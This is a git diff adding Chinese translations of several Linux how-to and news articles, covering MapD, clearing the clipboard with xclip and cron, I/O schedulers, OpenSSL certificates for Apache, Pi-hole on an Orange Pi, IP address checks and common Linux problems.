+[2]:http://www.2daygeek.com/monitor-disk-io-activity-using-iotop- +[3]:http://www.2daygeek.com/monitor-disk-io-activity-using-iotop- +[4]:https://en.wikipedia.org/wiki/Virtual_memory +[5]:http://www.2daygeek.com/sar-command-examples-system-performance-monitoring-linux/ diff --git a/published/201701/20170121 This GPU-powered database analytics platform can query billions of data points in milliseconds.md b/published/201701/20170121 This GPU-powered database analytics platform can query billions of data points in milliseconds.md new file mode 100644 index 0000000000..f1c2051f81 --- /dev/null +++ b/published/201701/20170121 This GPU-powered database analytics platform can query billions of data points in milliseconds.md @@ -0,0 +1,36 @@ +MapD:由 GPU 驱动的数据库分析平台可在几毫秒内查询数十亿条数据 +================================================= + + ![database analytics platform MapD](http://i0.wp.com/opensourceforu.com/wp-content/uploads/2015/03/Database-Backup1.jpg?resize=750%2C525) + + +麻省理工学院计算机科学与人工智能实验室(CSAIL)的前研究员开发了一款名为 MapD 的数据库分析平台。该平台使用 GPU 而不是 CPU ,可在几毫秒内查询和映射数十亿条数据。 + +人们通常将 GPU 与图像处理和游戏相关联。然而,现代 GPU 中高效的核心和处理单元也可以用于通用计算应用。以前在 CSAIL 工作的 Todd Mostak 开发了 MapD,它能在毫秒内处理数十亿条数据。 + +Mostak [声称][5] 他的 MapD 比由 CPU 驱动的传统数据库管理系统的快 100 倍。该平台可以在短时间内处理并可视化大量数据,并且被处理的数据的参数可以很容易地修改。 + +MapD 将所有数据缓存在多个 GPU 上,而不是存储在某些 CPU 上。每个 GPU 被给予不同的缓冲池以节省时间。通过此过程,系统可以提供比 CPU 驱动的数据库系统快两到三倍的性能。 + +许多公司客户已经开始使用 Mostak 的 MapD。像 Verizon 这样的电信公司据说也在为其内部研发尝试该数据库分析平台。这家电信公司使用 MapD 分析了 8500 万用户的 SIM 卡更新数据库。 + +除了 Verizon,MapD 还有如社交媒体公司,金融和广告公司的客户。 + +由 Mostak 领导的创业公司最近从美国中央情报局的投资部门 In-Q-Tel 筹集了一笔资金。你可以期望在不久的将来在不同的领域中使用 MapD 的各种情况。 + +-------------------------------------------------------------------------------- + +via: http://opensourceforu.com/2017/01/gpu-powered-database-analytics-platform-query-billions-data-points/ + +作者:[RAJAT KABADE][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://twitter.com/home?status=This%20GPU-powered%20database%20analytics%20platform%20can%20query%20billions%20of%20data%20points%20in%20milliseconds+http://opensourceforu.com/2017/01/gpu-powered-database-analytics-platform-query-billions-data-points/ +[2]:https://plus.google.com/share?url=http://opensourceforu.com/2017/01/gpu-powered-database-analytics-platform-query-billions-data-points/ +[3]:http://pinterest.com/pin/create/button/?url=http://opensourceforu.com/2017/01/gpu-powered-database-analytics-platform-query-billions-data-points/&media=http://opensourceforu.com/wp-content/uploads/2015/03/Database-Backup1.jpg&description=This%20GPU-powered%20database%20analytics%20platform%20can%20query%20billions%20of%20data%20points%20in%20milliseconds +[4]:https://www.tumblr.com/widgets/share/tool?shareSource=legacy&canonicalUrl=&url=http%3A%2F%2Fopensourceforu.com%2F2017%2F01%2Fgpu-powered-database-analytics-platform-query-billions-data-points%2F&posttype=link&title=This+GPU-powered+database+analytics+platform+can+query+billions+of+data+points+in+milliseconds&content= +[5]:http://news.mit.edu/2017/startup-mapd-fast-big-data-mapping-0111 diff --git a/published/201701/20170121 Your Computers Clipboard is a Security Problem - Fix it in Linux with xsel and cron.md b/published/201701/20170121 Your Computers Clipboard is a Security Problem - Fix it in Linux with xsel and cron.md new file mode 100644 index 0000000000..55613078d9 --- /dev/null +++ b/published/201701/20170121 Your Computers Clipboard is a Security Problem - Fix it in Linux with xsel and cron.md @@ -0,0 +1,92 @@ +剪切板是一个安全问题 - 在 Linux 中你可以用 xclip 和 cron 修复它 +============================================================ + + ![](https://irp-cdn.multiscreensite.com/58a25abc/dms3rep/multi/desktop/clip2-630x520.png) + + +**更新:我原文推荐的是 xsel,但几个用户报告说它禁用了他们的声音。这对我来说不是问题,但我发现了另一种方式(使用 [xclip][1] )来实现同样的目标,这样应该就能回避这个问题。文章已更新,切换到了 xclip。** + +在你的操作系统上复制/粘贴的能力是必不可少的。无论你写的是代码还是剧本,这两个功能是在计算机上处理文本的核心。当你复制文本时,它会进入内存驻留的剪贴板。除非安装了可以容纳多个条目的剪贴板管理器,否则剪贴板默认情况下只会处理一个_复制_事件,当你_复制_其他东西的时候,它之前的条目才会消失。在标准 Linux 设置中,剪贴板内容存储在控制它的程序的内存中(通常是 Xorg)。 + +剪贴板应该有所限制,因为任何程序都可以读取其内容,如果放任它,它保存的东西就会一直呆在那里。此外,现代浏览器允许恶意网站以多种方式从剪贴板读取(和写入)。 + +虽然不是默认设置,但浏览器可以设置为禁止访问剪贴板。虽然也有用于浏览器和操作系统管理剪贴板的附加组件,但是,在此链条的源头解决问题更容易、更可靠,并使系统范围内的剪贴板安全。有很多理由使用一个剪贴板,但没有足够的理由让内容在那里保留一两分钟以上。 + +密码管理器最近变得很受欢迎,如果你使用过的话,你已经了解了它们如何将密码复制到剪贴板,以便你可以将其粘贴到浏览器中,并登录到你的帐户。接下来会发生什么?你的密码会保留在剪贴板上,直到另一个复制事件或重新启动。 + +即使你使用单独的浏览器来处理银行等事务,复制密码时,通过剪贴板会将其带回其他浏览器,并将其暴露在基于 web 的剪贴板收集技术中。 + +我的解决方案是在后台进行处理,每分钟自动清除剪贴板的内容。它使用 xclip 这个命令行工具、一个小脚本和 [cron][2]。cron 的一分钟间隔给你足够的时间来复制密码,然后它会清空剪贴板。此动作会每分钟执行一次,保证复制无忧。 + +我们需要使用 [xclip][3] 工具清除终端中的剪贴板。在基于 apt 的发行版中,输入: + +``` +sudo apt-get install xclip +``` + +我们在终端中测试一下程序。首先从某处复制一些文字,复制到其他地方,并输入这两条命令: + +``` +touch blank +xclip -selection clipboard blank +``` + +接着再次尝试复制文本 - 它应该就会消失了。现在把这个命令放在脚本中。创建一个脚本(用你的文本编辑器代替 leafpad): + +``` +leafpad nukeclipboard.sh +``` + +并在新文件中输入下面的内容: + +``` +#!/bin/sh +touch blank && xclip -selection clipboard blank +``` + +保存并关闭文件,接着加上可执行权限: + +``` +chmod +x nukeclipboard.sh +``` + +现在让 cron 任务每分钟运行一次。首先要小心,不同的发行版有不同的 cron 选项。以下设置适用于 Ubuntu(基于)的发行版,并且在你的发行版中过程可能不同,因此[请阅读手册][4]。 + +要设置 cron 任务,请在终端输入: + +``` +crontab -e +``` + +在最后被注释掉的行后,输入下面的行(将 `/home/user/` 替换为你的脚本位置): + +``` +* * * * * export DISPLAY=:0 && /home/user/nukeclipboard.sh +``` + +现在按下 `ctrl-o` 保存(使用你的 cron 任务编辑器的保存快捷键),然后点击回车保存你的 crontab。最后,按下 `ctrl-x` 退出程序。从现在起,你的剪贴板的使用寿命为一分钟。 + +关于上面的 cron 条目的解释: cron 有环境变量的限制,当它失败时,你可能要花一整天试着一百种方法来解决它。在我找到了一个建议设置 DISPLAY 的[快速修复][5] 后,就解决了。感谢 [Mike Q][6] 的贡献。 + +现在,可能会发生当你要粘贴复制的东西时,正好剪贴板被清空,从而无法粘贴,但它只是安全的一个小的代价。 如果这是一个问题,您可以配置 cron 以任何适合您的间隔运行任务(比如 2 分钟)。 Ubuntu 的说明在[此] [7]页。 + +我希望这个教程能帮助你把剪贴板锁定下来 - 如果你有可以工作的脚本或者更好的方法,欢迎来做评论。 + +-------------------------------------------------------------------------------- + +via: https://www.darrentoback.com/your-computer-s-clipboard-is-a-security-problem-fix-it-in-linux-with-xsel-and-cron + +作者:[dmt][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.darrentoback.com/about-me +[1]:https://github.com/astrand/xclip +[2]:https://en.wikipedia.org/wiki/Cron +[3]:https://github.com/astrand/xclip +[4]:https://en.wikipedia.org/wiki/Cron +[5]:https://stackoverflow.com/questions/14296911/when-linux-system-calls-scripts-some-commands-dont-work-cron-if-up-d/24070707#24070707 +[6]:https://stackoverflow.com/users/1618630/mike-q +[7]:https://help.ubuntu.com/community/CronHowto diff --git a/published/20170104 How to change the Linux IO scheduler to fit your needs.md b/published/20170104 How to change the Linux IO scheduler to fit your needs.md new file mode 100644 index 0000000000..4e0bd927bd --- /dev/null +++ b/published/20170104 How to change the Linux IO scheduler to fit your needs.md @@ -0,0 +1,79 @@ +如何更改 Linux I/O 调度器调整性能 +============================================================ + +为了从 Linux 服务器榨取尽可能多的性能,请了解如何更改 I/O 调度器以满足你的需求。 + + ![](http://tr1.cbsistatic.com/hub/i/r/2016/05/04/f765c3c7-ee08-4f3a-876a-66137ad4e6df/resize/770x/131c6931386ecf37104e8ada8d01e903/hackershero.jpg) + +Linux I/O 调度器(Linux I/O scheduler)控制内核提交读写请求给磁盘的方式。自从 2.6 内核以来,管理员已经能够更改这个调度器,所以他们可以自定义他们的平台以完全适合他们的需要。 + +有三个调度器可供选择,每个调度器都有其优点。这些调度器是: + +* **[CFQ (Completely Fair Scheduler(完全公平调度器))][7](cfq)** :它是许多 Linux 发行版的默认调度器;它将由进程提交的同步请求放到多个进程队列中,然后为每个队列分配时间片以访问磁盘。 +* **[Noop 调度器][8](noop)** : 基于先入先出(FIFO)队列概念的 Linux 内核里最简单的 I/O 调度器。此调度程序最适合于 SSD。 +* **[截止时间调度器][9](deadline)** : 尝试保证请求的开始服务时间。 + +当你想要让 Linux 机器发挥最佳性能时,这可能是你所要做的事情之一。幸运的是,更改 I/O 调度器非常简单。让我告诉你怎么做。 + +### 找出你有的调度器 + +你需要做的第一件事是找出哪个调度器正在处理你系统上的 I/O。这是从命令行完成的,你必须知道磁盘的名称。为简单起见,我假设磁盘是 sda。据此信息,打开终端窗口并输入以下命令: + +``` +cat /sys/block/sda/queue/scheduler +``` + +该命令的结果将显示当前运行的调度程序(下图)。 + + ![Figure A](http://tr3.cbsistatic.com/hub/i/2017/01/03/abba7f22-3252-4b76-91c0-bb15630fd42c/6b4a6d971202b70926b2d991e6c9afe3/schedulera.jpg) + +*Elementary OS Loki 运行 deadline 调度器。* + +### 更改你的调度器 + +你可以通过两种方式更改你的调度器:即时或永久。如果你即时更改调度器,它会在重启后恢复到之前的默认调度器。你可能希望首先进行即时更改,以查看哪个调度器能为你的需求带来最佳性能。 + +说到你要即时改到 noop 调度器。 为此,输入以下命令: + +``` +sudo echo noop > /sys/block/hda/queue/scheduler +``` + +你可以将 `noop` 更改为 `cfq` 或 `deadline`。 + +此更改可以在不重新启动计算机的情况下生效。 一旦更改,I/O 调度器将会切换,(希望)你能看到性能提高(再说一次,根据你的需要而定)。 + +如果要将调度器更改为永久,则必须在 GRUB 配置文件中执行此操作。 为此,请输入 `sudo nano /etc/default/grub`,然后修改下面的行: + +``` +GRUB_CMDLINE_LINUX_DEFAULT="quiet splash" +``` + +到 + +``` +GRUB_CMDLINE_LINUX_DEFAULT="quiet splash elevator=noop" +``` + +同样,你可以改变 `noop` 为任何你需要的调度器。如果你用的是即时修改,则不必重新启动以使新调度器生效。 + +这些就是修改调度器的方法了。 + +### 做出明智的选择 + +你应该做研究,找出什么调度器最适合你的特殊情况。要了解每个调度器的更多信息,请查看这些 Wiki 页面:[CFS][7]、[Noop][8]和 [Deadline][9]。 + +-------------------------------------------------------------------------------- + +via: http://www.techrepublic.com/article/how-to-change-the-linux-io-scheduler-to-fit-your-needs/ + +作者:[Jack Wallen][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.techrepublic.com/meet-the-team/us/jack-wallen/ +[7]:https://en.wikipedia.org/wiki/Completely_Fair_Scheduler +[8]:https://en.wikipedia.org/wiki/Noop_scheduler +[9]:https://en.wikipedia.org/wiki/Deadline_scheduler diff --git a/translated/tech/20170105 OpenSSL For Apache and Dovecot part 1.md b/published/20170105 OpenSSL For Apache and Dovecot part 1.md similarity index 65% rename from translated/tech/20170105 OpenSSL For Apache and Dovecot part 1.md rename to published/20170105 OpenSSL For Apache and Dovecot part 1.md index 6ca561909d..c6365507ba 100644 --- a/translated/tech/20170105 OpenSSL For Apache and Dovecot part 1.md +++ b/published/20170105 OpenSSL For Apache and Dovecot part 1.md @@ -1,28 +1,25 @@ -OpenSSL 在 Apache 和 Dovecot 下的使用:第一部分 +OpenSSL 在 Apache 和 Dovecot 下的使用(一) ============================================================ - ![OpenSSL](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/openssl.jpg?itok=RWoqdCAI "OpenSSL") -在这有两部分的系列中,Carla Schroder 会向你展示如何创建自己的 OpenSSL 证书以及如何配置 Apache 和 Dovecot 来使用它们。 - -[Creative Commons Zero][1]Pixabay +![OpenSSL](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/openssl.jpg?itok=RWoqdCAI "OpenSSL") +> 在这有两部分的系列中,Carla Schroder 会向你展示如何创建自己的 OpenSSL 证书以及如何配置 Apache 和 Dovecot 来使用它们。 这么长时间之后,我的读者们,这里是我给你们承诺的在 Apache 中使用 OpenSSL 的方法,下周你会看到在 Dovecot 中使用 SSL。 在这个分为两部分的系列中,我们将学习如何创建自己的 OpenSSL 证书,以及如何配置 Apache 和 Dovecot 来使用它们。 这些例子基于这些教程: -* [给初学者看的在 Ubuntu Linux 上使用 Apache][3] -* [给初学者看的在 Ubuntu Linux 上使用 Apache:第2部分][4] -* [给初学者看的在 CentOS Linux 上使用 Apache][5] +* [给初学者看的在 Ubuntu Linux 上使用 Apache][3] +* [给初学者看的在 Ubuntu Linux 上使用 Apache:第 2 部分][4] +* [给初学者看的在 CentOS Linux 上使用 Apache][5] ### 创建你的证书 -Debian/Ubuntu/Mint 存储私钥和符号链接到位于 `/etc/ssl` 中的证书中。与系统捆绑的证书保存在 `/usr/share/ca-certificates` 中。你安装或创建的证书在 `/usr/local/share/ca-certificates/` 中。 +Debian/Ubuntu/Mint 会在 `/etc/ssl` 中存储私钥和证书的符号链接。系统自带的证书保存在 `/usr/share/ca-certificates` 中。你安装或创建的证书在 `/usr/local/share/ca-certificates/` 中。 这个例子是对 Debian 而言。创建私钥和公用证书,将证书转换为正确的格式,并将其符号链接到正确的目录: ``` - $ sudo openssl req -x509 -days 365 -nodes -newkey rsa:2048 \ -keyout /etc/ssl/private/test-com.key -out \ /usr/local/share/ca-certificates/test-com.crt @@ -59,34 +56,31 @@ done. CentOS/Fedora 使用不同的文件结构,并不使用 `update-ca-certificates`,使用这个命令: ``` - $ sudo openssl req -x509 -days 365 -nodes -newkey rsa:2048 \ -keyout /etc/httpd/ssl/test-com.key -out \ /etc/httpd/ssl/test-com.crt ``` -最重要的条目是 Common Name,它必须与你的完全限定域名完全匹配。 这一切都是任意的。 用 `-nodes` 创建一个无密码的证书,这是Apache所必需的。用 `-days` 定义过期日期。这是一个麻烦的更新证书的方法,但它应该能够提供一些额外的安全。参见[ 90 天证书有效期的利弊][10],以便进行良好的讨论。 +最重要的条目是 `Common Name`,它必须与你的完全限定域名(FQDN)完全匹配。此外其它信息都是任意的。`-nodes` 用于创建一个无密码的证书,这是 Apache 所必需的。`-days` 用于定义过期日期。更新证书是一个麻烦的事情,但这样应该能够额外提供一些安全保障。参见 [90 天证书有效期的利弊][10]中的讨论。 ### 配置 Apache -现在配置 Apache 以使用你的新证书。如果你遵循[给初学者看的在 Ubuntu Linux 上使用 Apache:第2部分][11],你所要做的就是修改虚拟主机配置中的 `SSLCertificateFile` 和 `SSLCertificateKeyFile`,以指向你的新私钥和公共证书。本教程中的 `test.com` 示例现在看起来像这样: +现在配置 Apache 以使用你的新证书。如果你遵循[给初学者看的在 Ubuntu Linux 上使用 Apache:第 2 部分][11],你所要做的就是修改虚拟主机配置中的 `SSLCertificateFile` 和 `SSLCertificateKeyFile`,以指向你的新私钥和公共证书。来自该教程中的 `test.com` 示例现在看起来像这样: ``` - SSLCertificateFile /etc/ssl/certs/test-com.pem SSLCertificateKeyFile /etc/ssl/private/test-com.key ``` -CentOS 用户,请参阅在 CentOS wiki 中[使用 CentOS 设置 SSL 加密的 Web 服务器][12]。过程是类似的,wiki 会告诉如何处理 SELinux。 +CentOS 用户,请参阅在 CentOS wiki 中的[在 CentOS 上设置 SSL 加密的 Web 服务器][12]一文。过程是类似的,wiki 会告诉如何处理 SELinux。 ### 测试 Apache SSL -一个简单的方法是将你的网络浏览器指向 [https://yoursite.com][13],看看它是否可以正常工作。在第一次这样做时,你会在你过度保护的 web 浏览器中看到可怕的警告说网站是不安全的,因为它使用的是自签名证书。请忽略你的浏览器并单击屏幕创建永久性异常。 如果你遵循在[给初学者看的在 Ubuntu Linux 上使用 Apache:第2部分][14]上的示例虚拟主机配置,那么即使你的网站访问者尝试使用纯 HTTP,你的网站的所有流量都将被迫通过 HTTPS。 +一个简单的方法是用你的网络浏览器访问 https://yoursite.com,看看它是否可以正常工作。在第一次这样做时,你会在你过度保护的 web 浏览器中看到可怕的警告说网站是不安全的,因为它使用的是自签名证书。请忽略你这个敏感的浏览器,并单击屏幕创建永久性例外。 如果你遵循在[给初学者看的在 Ubuntu Linux 上使用 Apache:第 2 部分][14]上的示例虚拟主机配置,那么即使你的网站访问者尝试使用纯 HTTP,你的网站的所有流量都将强制通过 HTTPS。 -一个很好测试方法是使用OpenSSL。是的,有一个漂亮的命令来测试这些东西。试下这个: +一个很好测试方法是使用 OpenSSL。是的,有一个漂亮的命令来测试这些东西。试下这个: ``` - $ openssl s_client -connect www.test.com:443 CONNECTED(00000003) depth=0 C = US, ST = WA, L = Seattle, O = Alrac Writing Sweatshop, @@ -108,18 +102,16 @@ Server certificate ### 创建一个证书签名请求 -如果你决定使用第三方证书颁发机构(CA),那么就必须创建证书签名请求(CSR)。你将它发送给你的新 CA,他们将签署并将其发送给您。他们可能有自己的要求来创建你的 CSR; 这是如何创建一个新的私钥和 CSR 的示例: +如果你决定使用第三方证书颁发机构(CA),那么就必须创建证书签名请求(CSR)。你将它发送给你的新 CA,他们将签署并将其发送给您。他们可能对创建你的 CSR 有自己的要求; 这是如何创建一个新的私钥和 CSR 的典型示例: ``` - $ openssl req -newkey rsa:2048 -nodes \ -keyout yourdomain.key -out yourdomain.csr ``` -你可以从一个已经存在的 key 中创建一个 CSR: +你也可以从一个已经存在的 key 中创建一个 CSR: ``` - $ openssl req -key yourdomain.key \ -new -out domain.csr ``` @@ -128,11 +120,11 @@ $ openssl req -key yourdomain.key \ ### 额外的教程 -[消灭让人害怕的 web 浏览器 SSL 警告][16] -[如何在 Linux 上使用 OpenVPN 设置安全远程网络:第一部分][17] -[如何在 Linux 上使用 OpenVPN 设置安全远程网络:第一部分][18] +- [消灭让人害怕的 web 浏览器 SSL 警告][16] +- [如何在 Linux 上使用 OpenVPN 设置安全远程网络:第一部分][17] +- [如何在 Linux 上使用 OpenVPN 设置安全远程网络:第一部分][18] -_提高你的系统管理职业生涯吧!查看Linux基金会的[ ][6][系统管理的要点][7][ ][8]课程。_ +提高你的系统管理职业生涯吧!查看Linux基金会的[系统管理的要点][8]课程。 -------------------------------------------------------------------------------- @@ -140,7 +132,7 @@ via: https://www.linux.com/learn/sysadmin/openssl-apache-and-dovecot 作者:[CARLA SCHRODER][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/published/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md b/published/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md new file mode 100644 index 0000000000..88404c7efa --- /dev/null +++ b/published/20170107 Block Ads on All Your Devices at Home with Pi-hole and an Orange Pi.md @@ -0,0 +1,76 @@ +用 Pi-hole 和 Orange Pi 阻止家中所有设备上的广告 +============================================================ + +你是否很恼火地发现你的浏览器、智能手机和平板上不装广告拦截器不行? 至少我是这样的。我家里有一些“智能”设备,但是它们似乎没有任何类型的广告拦截软件。 好了,我了解到 [Pi-hole][2] 是一个可以运行在树莓派板子上的广告拦截软件,它能在各种广告到达你的设备之前拦截它们。它允许你将任何域加入到黑名单或白名单,并且它有一个很好的仪表盘面板,可以让你深入了解你的家庭网络最常访问的域/网站、最活跃的设备和最常见的广告商。 + +Pi-hole 原本是运行在树莓派上的,但我想知道它能否在我运行 Armbian Linux 的廉价 Orange Pi 上运行。 好吧,它绝对可以!下面是我让 Pi-hole 能快速运行的方法。 + +### 安装 Pi-hole + +安装 Pi-hole 是使用终端完成的,所以打开你的 Orange Pi 桌面上的终端或使用 ssh 连接。 + +因为需要下载软件,所以进入到一个你选定的目录,确保你有写入权限。像这样: + +``` +cd / +``` + +我没有选择 Pi-hole 主页上的“单条命令”安装方式。 我的意思是,他们在那条命令下面写着“用管道到 bash 可能是危险的”,本地安装“更安全”。所以,这里是我的本地安装步骤: + +``` +git clone --depth 1 https://github.com/pi-hole/pi-hole.git Pi-hole +cd Pi-hole/automated\ install/ +./basic-install.sh +``` + +如果你没有以 root 用户身份登录,那么这个安装脚本将提示你输入密码,然后再继续。 如果需要,脚本将下载并安装一些必备的 Linux 软件包。接着它会显示一个红蓝界面,提示你回答有关如何配置 Pi-hole 的几个问题。以我的经验,直接接受默认值就可以了,我后来发现 Pi-hole 的 web 应用可以让你更改设置,比如 DNS 提供商。 + +该脚本将告诉你在图形界面和终端中 Pi-hole 的密码。 请记住该密码! + +脚本还会告诉你 Pi-hole 的网址,应该像这样: + +``` +http:///admin +``` + +或者类似这样: + +``` +http://orangepipc/admin +``` + +输入 Pi-hole 密码,接着你会看到像下面这样的漂亮的仪表盘面板: + + ![Ph-hole](https://i1.wp.com/piboards.com/wp-content/uploads/2017/01/ph-hole.png?resize=640%2C532) + +请记住更改家庭网络路由器上的 DNS 设置并使用你的 Orange Pi 的地址。 否则,广告不会被过滤! + +上面的说明与 Pi-hole 网站提供的替代“安全”方法大致相同,尽管 Armbian 没有被列为官方支持的操作系统。我相信这些说明应该在树莓派或其他运行某种形式的基于 Debian 的 Linux 操作系统的 Pi 上工作。但是,我并没有测试这一点,所以期待听到你的经验(请给我留下简短的评论)。 + +### 思考和观察 + +运行 Pi-hole 一段时间,并研究了在 Pi-hole 面板上出现的信息后,我发现有很多我不知道的网络活动在进行,而它们并不都是我批准的活动。例如,有一些我不知道的关于游戏程序的“有趣”连接从我的孩子的设备上发出,还有社交网络程序显然一直在给我发送骚扰数据。总之,无论是否是无害流量,我很高兴减少了流量负载,即使仅减少了一点点……我的意思是,为什么我应该允许我不想要的或者不关心的应用程序和广告吃掉我的网络流量?好吧,现在他们被封锁了。 + +像这样为 Orange Pi 设置广告屏蔽很便宜、容易,限制一些不必要的流量在我的家庭网络中进出(特别是与孩子们相关的)使我感到放松多了。如果有兴趣,你可以看看我的上一篇文章,如何[轻松设置一个 Orange Pi][3],并使用下面的链接来查看 Orange Pi 是多么便宜。我相信这是一个值得的投资。 + +- Amazon 上的 Orange Pi (受益链接):  [Orange Pi PC Single Board Computer Quad Core ARM Cortex-A7 1GB DDR3 4K Decode][4] +- [AliExpress 上的 Orange Pi 商店][5] (受益链接) + +更新:具有讽刺意味的是,如果你成功地按照这篇文章设置了 Pi-hole,这个站点上(s.click.aliexpress.com)的受益链接会被屏蔽,是否将它加入到白名单取决于你。 + +-------------------------------------------------------------------------------- + +via: http://piboards.com/2017/01/07/block-ads-on-all-your-devices-at-home-with-pi-hole-and-an-orange-pi/ + +作者:[MIKE WILMOTH][a] +译者:[geekpi](https://github.com/geekpi) +校对:[jasminepeng](https://github.com/jasminepeng) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://piboards.com/author/piguy/ +[1]:http://s.click.aliexpress.com/deep_link.htm?aff_short_key=N3VJQBY&dl_target_url=http://best.aliexpress.com +[2]:https://pi-hole.net/ +[3]:http://piboards.com/2017/01/04/easy-set-up-orange-pi/ +[4]:https://www.amazon.com/gp/product/B018W6OTIM/ref=as_li_tl?ie=UTF8&camp=1789&creative=9325&creativeASIN=B018W6OTIM&linkCode=as2&tag=piboards-20&linkId=ac292a536d58eabf1ee73e2c575e1111 +[5]:http://s.click.aliexpress.com/e/bAMVj2R diff --git a/published/20170107 Check your Local and Public IP address.md b/published/20170107 Check your Local and Public IP address.md new file mode 100644 index 0000000000..ba81d0bbf0 --- /dev/null +++ b/published/20170107 Check your Local and Public IP address.md @@ -0,0 +1,38 @@ +小技巧:检查你本地及公共 IP 地址 +=================== + +**你本地的 IP 地址:** **192.168.1.100** + +上面是分配给你计算机上的内部硬件或虚拟网卡的本地/私有 IP 地址。根据你的 LAN 配置,上述 IP 地址可能是静态或动态的。 + +**如果你找不到上述任何地址,请在 Linux 上执行 `ifconfig` 或 `ip` 命令手动检查内部 IP 地址:** + +``` +# ifconfig | grep -w inet | awk '{ print $2}' +或者 +# ip a s | grep -w inet | awk '{ print $2}' +``` + +**你公共的 IP 地址是:** **123.115.72.251** + +上述地址是你的 Internet 服务提供商(ISP)为你分配的公共/外部 IP 地址。根据你与 ISP 的计划,它可能是动态的,这意味着它会在每次重启路由器后改变,它也可能是静态的,这意味着它将永远不会改变。 + +**如果你找不到上述任何地址,请在 Linux上 执行 `wget` 或 `curl` 命令手动检查你的公共IP地址:** + +``` +# echo $(wget -qO - https://api.ipify.org) +或者 +# echo $(curl -s https://api.ipify.org) +``` + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/check-your-local-and-public-ip-address + +作者:[Lubos Rendek][a] +译者:[geekpi](https://github.com/geekpi) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/check-your-local-and-public-ip-address diff --git a/published/20170109 Troubleshooting tips for the 5 most common Linux issues.md b/published/20170109 Troubleshooting tips for the 5 most common Linux issues.md new file mode 100644 index 0000000000..ebae9ea8c1 --- /dev/null +++ b/published/20170109 Troubleshooting tips for the 5 most common Linux issues.md @@ -0,0 +1,69 @@ +故障排除提示:5 个最常见的 Linux 问题 +============================================================ + +> 了解如何解决Linux桌面用户遇到的最常见的问题 + + ![5个linux最常见问题解决提示](https://opensource.com/sites/default/files/styles/image-full-size/public/images/law/rh_003601_05_mech_osyearbook2016_containers_cc.png?itok=0ZEfXLEE "Troubleshooting tips for the 5 most common Linux issues") + +图片:Opensource.com + +尽管绝大多数用户如预期地成功安装和操作了 Linux, 但不可避免地仍会有一些用户遇到问题。作为今年任务队列里的最后一篇文章,我认为在即将进入 2016 年时,总结一下人们所遇到的最常见的技术性的 Linux 问题会很有趣。我把这个问题发布到了 LinuxQuestions.org(LQ) 和社交媒体,我分析了 LQ 的帖子情况之后,得到如下成果。 + +### 1、 Wifi 驱动程序(特别是 Broadcom 芯片) + +一般来说,Wifi 驱动程序,特别是 Broadcom 无线网卡,仍然是 Linux 面临的最大的问题技术问题之一。在 LQ 上,2016 年有数以百计的帖子在讨论这个话题,而且还有其他无数的地方也是。市场上有数十种 Broadcom 无线网卡可供使用,但为每一个发行版描述具体的排错细节来已经超出了一篇文章的范畴,但是基本的故障排除步骤是相同的: + +* 通过使用 `lspci` 命令确定具体使用的 Broadcom 卡,以找出 PCI ID, +* 确定使用发行版是否支持该卡, +* 如果支持,找到正确的方法来使网卡工作。 + +例如,如果有一个 `14e4:4315` PCI ID 的卡,并且系统为 Ubuntu,则应该知道 BCM4312 卡可以通过安装 `firmware-b43-installer` 包来驱动。另一个选择是在购买之前,研究好可用的 WiFi 卡,以确保您的发行版完全支持它。 + +### 2、 打印机驱动程序(特别是佳能和 Lexmark) + +打印机也是常有问题的,佳能和 Lexmark 被反复提及遇到这种问题。如果您要购买一台新打印机,请在购买之前研究兼容性。但是,如果您从其他操作系统迁移,这可能没得选择。如果你正在做调研,[OpenPrinting][1] 数据库和您的发行版的官方支持渠道是两个最好的起点。请注意,您应确保设备的所有功能完全兼容,特别是如果它是个多功能产品。对佳能打印机的一个常见的抱怨是,驱动程序通常只能在非英语,甚至是很难找的网站上才有。 + +> 如果您购买的是新打印机,请在购买之前研究兼容性。 + +### 3、 显卡 + +显卡是一个微妙的话题,因为在 Linux 上显卡可以非常好的简单直观的开箱即用。出现的问题是:显卡加速器/3D 加速;最新的显卡和最新显示技术,如 NVIDIA Optimus 和 ATI 动态 GPU 切换;专有驱动程序的安装和稳定性;能效管理;以及可靠的挂起和恢复。如果你不是一个游戏玩家,也没有别的需要高端图形功能的需求,并且不是使用笔记本电脑,那么你可能不必担心这个。如果您正在寻找一台新的笔记本电脑,一定要在购买前研究好兼容性。如果你是一个游戏玩家或需要最高端的图形功能,你需要明确知道你的需求是什么,然后开始你的研究。幸运的是,这种情况正在改善,Wayland 开始解决问题,2017 年情况应该会变得好一些。 + +### 4、 声卡 + +再次,对于简单配置,声卡非常容易设置并可以很可靠地在 Linux 上运行。一旦你买的是专业级产品,例如回声消除、音频路由,统一混合和其他复杂的配置,它可能就很快地每况愈下。我的建议是,如果你需要高端的实时音频,请使用专用的音频相关的发行版。 + +### 5、 安装 + +有了这个包罗万象的分类,本文几乎保证是高质量的。也就是说,公平的说,我不知道 Linux 有普遍的安装问题。绝大多数的安装都按预期进行。Linux 支持多种硬件,安装 Linux 